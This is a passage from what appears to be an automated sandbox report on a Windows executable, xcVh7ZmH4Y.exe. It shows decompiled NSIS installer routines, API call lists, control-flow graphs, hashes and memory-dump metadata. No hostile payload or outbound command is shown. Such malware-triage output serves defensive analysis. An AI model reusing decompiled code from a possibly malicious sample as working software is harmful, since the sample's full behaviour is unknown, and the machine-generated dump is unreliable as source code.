                                                                                      0x00403cb4
                                                                                      0x00403cc6
                                                                                      0x00403ccb
                                                                                      0x00403cd4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403cda
                                                                                      0x00403cdc
                                                                                      0x00403ce9
                                                                                      0x00403ce9
                                                                                      0x00403cf2
                                                                                      0x00403cf8
                                                                                      0x00403d20
                                                                                      0x00403d28
                                                                                      0x00000000
                                                                                      0x00403d0a
                                                                                      0x00403d0b
                                                                                      0x00403d14
                                                                                      0x00403d1a
                                                                                      0x00403d1b
                                                                                      0x00000000
                                                                                      0x00403d1b
                                                                                      0x00403d16
                                                                                      0x00403d18
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403d18
                                                                                      0x00403cf8

                                                                                      APIs
                                                                                        • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                        • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                      • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75A43420), ref: 00403CED
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                      • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                        • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-1862882193
                                                                                      • Opcode ID: 3f3578f5c36ca085bc464682e588f9d41497884baa4372cf005748276afb9df9
                                                                                      • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                      • Opcode Fuzzy Hash: 3f3578f5c36ca085bc464682e588f9d41497884baa4372cf005748276afb9df9
                                                                                      • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 389 403110-403127 388->389 391 403129 389->391 392 40312b-403134 call 4034cf 389->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 397 403205-40321d call 4034e5 call 4034cf 395->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 395->398 396->380 397->396 421 40321f-403225 397->421 398->396 426 403264-403275 398->426 401->396 405 403143-403157 call 405fe8 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069f7 411->418 417->389 425 4031ee 417->425 418->417 421->396 421->398 424->411 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->411 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                                                      C-Code - Quality: 80%
                                                                                      			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x4ad42
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x4ad46
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                      0x00403085
                                                                                      0x00403088
                                                                                      0x0040308b
                                                                                      0x0040308e
                                                                                      0x00403094
                                                                                      0x004030a5
                                                                                      0x004030aa
                                                                                      0x004030bd
                                                                                      0x004030c2
                                                                                      0x004030c5
                                                                                      0x004030cb
                                                                                      0x00000000
                                                                                      0x004030cd
                                                                                      0x004030de
                                                                                      0x004030ef
                                                                                      0x004030f6
                                                                                      0x004030fc
                                                                                      0x004030fe
                                                                                      0x00403103
                                                                                      0x00403105
                                                                                      0x004031f0
                                                                                      0x004031f2
                                                                                      0x004031f7
                                                                                      0x004031fe
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403200
                                                                                      0x00403203
                                                                                      0x00403227
                                                                                      0x00403227
                                                                                      0x0040322c
                                                                                      0x00403232
                                                                                      0x0040323d
                                                                                      0x00403242
                                                                                      0x00403242
                                                                                      0x00403245
                                                                                      0x00403246
                                                                                      0x00403247
                                                                                      0x00403249
                                                                                      0x0040324e
                                                                                      0x00403251
                                                                                      0x00403264
                                                                                      0x00403268
                                                                                      0x00403270
                                                                                      0x00403275
                                                                                      0x00403277
                                                                                      0x00403277
                                                                                      0x00403277
                                                                                      0x0040327f
                                                                                      0x0040327f
                                                                                      0x00403282
                                                                                      0x00403283
                                                                                      0x00403283
                                                                                      0x00403286
                                                                                      0x00403288
                                                                                      0x00403288
                                                                                      0x00403288
                                                                                      0x00403292
                                                                                      0x00403298
                                                                                      0x004032a6
                                                                                      0x004032ab
                                                                                      0x00000000
                                                                                      0x004032ab
                                                                                      0x00000000
                                                                                      0x00403251
                                                                                      0x0040320b
                                                                                      0x00403216
                                                                                      0x0040321b
                                                                                      0x0040321d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403222
                                                                                      0x00403225
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040310b
                                                                                      0x00403110
                                                                                      0x00403115
                                                                                      0x00403119
                                                                                      0x00403120
                                                                                      0x00403125
                                                                                      0x00403127
                                                                                      0x00403129
                                                                                      0x00403129
                                                                                      0x0040312d
                                                                                      0x00403132
                                                                                      0x00403134
                                                                                      0x0040325c
                                                                                      0x00403253
                                                                                      0x00000000
                                                                                      0x00403253
                                                                                      0x0040313a
                                                                                      0x00403141
                                                                                      0x004031bd
                                                                                      0x004031c1
                                                                                      0x004031c5
                                                                                      0x004031ca
                                                                                      0x00000000
                                                                                      0x004031c1
                                                                                      0x0040314a
                                                                                      0x0040314f
                                                                                      0x00403152
                                                                                      0x00403157
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403159
                                                                                      0x00403160
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403162
                                                                                      0x00403169
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040316b
                                                                                      0x00403172
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403174
                                                                                      0x0040317b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040317d
                                                                                      0x00403183
                                                                                      0x0040318c
                                                                                      0x00403192
                                                                                      0x00403195
                                                                                      0x00403197
                                                                                      0x0040319d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031a3
                                                                                      0x004031a7
                                                                                      0x004031af
                                                                                      0x004031af
                                                                                      0x004031b2
                                                                                      0x004031b5
                                                                                      0x004031b7
                                                                                      0x004031b9
                                                                                      0x004031b9
                                                                                      0x00000000
                                                                                      0x004031b7
                                                                                      0x004031a9
                                                                                      0x004031ad
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031cb
                                                                                      0x004031cb
                                                                                      0x004031d1
                                                                                      0x004031dd
                                                                                      0x004031dd
                                                                                      0x004031e0
                                                                                      0x004031e6
                                                                                      0x004031e6
                                                                                      0x004031e6
                                                                                      0x004031ee
                                                                                      0x004031ee
                                                                                      0x00000000
                                                                                      0x004031ee

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040308E
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                      • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                      • API String ID: 2803837635-1045513272
                                                                                      • Opcode ID: 37209e3e5def914a9800fbc428d55447136e102254459de3f9cb7006d4f45717
                                                                                      • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                      • Opcode Fuzzy Hash: 37209e3e5def914a9800fbc428d55447136e102254459de3f9cb7006d4f45717
                                                                                      • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 744 4034c8-4034cc 739->744 742 4034aa-4034ad 740->742 743 40346c-40346f 740->743 745 4034c5 741->745 746 403367-40336f 741->746 747 4034b2-4034bb call 4034cf 742->747 748 4034af 742->748 743->745 749 403471 743->749 745->744 750 403371 746->750 751 403374-403382 call 4034cf 746->751 747->737 759 4034c2 747->759 748->747 753 403474-40347a 749->753 750->751 751->737 761 403388-403391 751->761 756 40347c 753->756 757 40347e-40348c call 4034cf 753->757 756->757 757->737 765 40348e-40349a call 4060df 757->765 759->745 762 403397-4033b7 call 406a65 761->762 769 403460-403462 762->769 770 4033bd-4033d0 GetTickCount 762->770 771 403464-403466 765->771 772 40349c-4034a6 765->772 769->739 773 4033d2-4033da 770->773 774 40341b-40341d 770->774 771->739 772->753 775 4034a8 772->775 776 4033e2-403413 MulDiv wsprintfW call 40559f 773->776 777 4033dc-4033e0 773->777 778 403454-403458 774->778 779 40341f-403423 774->779 775->745 785 403418 776->785 777->774 777->776 778->746 780 40345e 778->780 782 403425-40342c call 4060df 779->782 783 40343a-403445 779->783 780->745 788 403431-403433 782->788 784 403448-40344c 783->784 784->762 787 403452 784->787 785->774 787->745 788->771 789 403435-403438 788->789 789->784
                                                                                      C-Code - Quality: 95%
                                                                                      			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t101 =  *0x40ce60 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 =  *0x40ce60;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}























                                                                                      0x004032bf
                                                                                      0x004032c3
                                                                                      0x004032c6
                                                                                      0x004032cb
                                                                                      0x004032cd
                                                                                      0x004032cd
                                                                                      0x004032d4
                                                                                      0x004032d8
                                                                                      0x004032dd
                                                                                      0x004032df
                                                                                      0x004032df
                                                                                      0x004032e6
                                                                                      0x004032eb
                                                                                      0x004032f6
                                                                                      0x004032f6
                                                                                      0x00403308
                                                                                      0x004034bd
                                                                                      0x004034bd
                                                                                      0x00000000
                                                                                      0x0040330e
                                                                                      0x00403312
                                                                                      0x0040346a
                                                                                      0x004034ad
                                                                                      0x004034af
                                                                                      0x004034af
                                                                                      0x004034bb
                                                                                      0x004034c2
                                                                                      0x004034c5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004034bb
                                                                                      0x0040346f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403471
                                                                                      0x00403474
                                                                                      0x00403477
                                                                                      0x0040347a
                                                                                      0x0040347c
                                                                                      0x0040347c
                                                                                      0x0040348c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040349a
                                                                                      0x00403464
                                                                                      0x00403464
                                                                                      0x004034bf
                                                                                      0x004034bf
                                                                                      0x00000000
                                                                                      0x004034bf
                                                                                      0x0040349c
                                                                                      0x0040349f
                                                                                      0x004034a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004034a8
                                                                                      0x00000000
                                                                                      0x00403474
                                                                                      0x0040331e
                                                                                      0x00403320
                                                                                      0x00403327
                                                                                      0x0040332e
                                                                                      0x0040332e
                                                                                      0x00403335
                                                                                      0x0040333d
                                                                                      0x00403347
                                                                                      0x0040334c
                                                                                      0x00403354
                                                                                      0x0040335e
                                                                                      0x00403361
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403367
                                                                                      0x00403367
                                                                                      0x00403367
                                                                                      0x0040336f
                                                                                      0x00403371
                                                                                      0x00403371
                                                                                      0x00403382
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403388
                                                                                      0x0040338b
                                                                                      0x00403391
                                                                                      0x00403397
                                                                                      0x00403397
                                                                                      0x004033a2
                                                                                      0x004033a8
                                                                                      0x004033ad
                                                                                      0x004033b4
                                                                                      0x004033b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004033c3
                                                                                      0x004033c5
                                                                                      0x004033ce
                                                                                      0x004033d0
                                                                                      0x00403401
                                                                                      0x00403407
                                                                                      0x00403413
                                                                                      0x00403418
                                                                                      0x00403418
                                                                                      0x0040341d
                                                                                      0x00403458
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040341f
                                                                                      0x00403423
                                                                                      0x0040343f
                                                                                      0x00403442
                                                                                      0x00403445
                                                                                      0x00403448
                                                                                      0x0040344c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403452
                                                                                      0x0040342c
                                                                                      0x00403433
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403435
                                                                                      0x00000000
                                                                                      0x00403435
                                                                                      0x0040341d
                                                                                      0x00403460
                                                                                      0x00000000
                                                                                      0x00403460
                                                                                      0x00000000
                                                                                      0x00403367

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
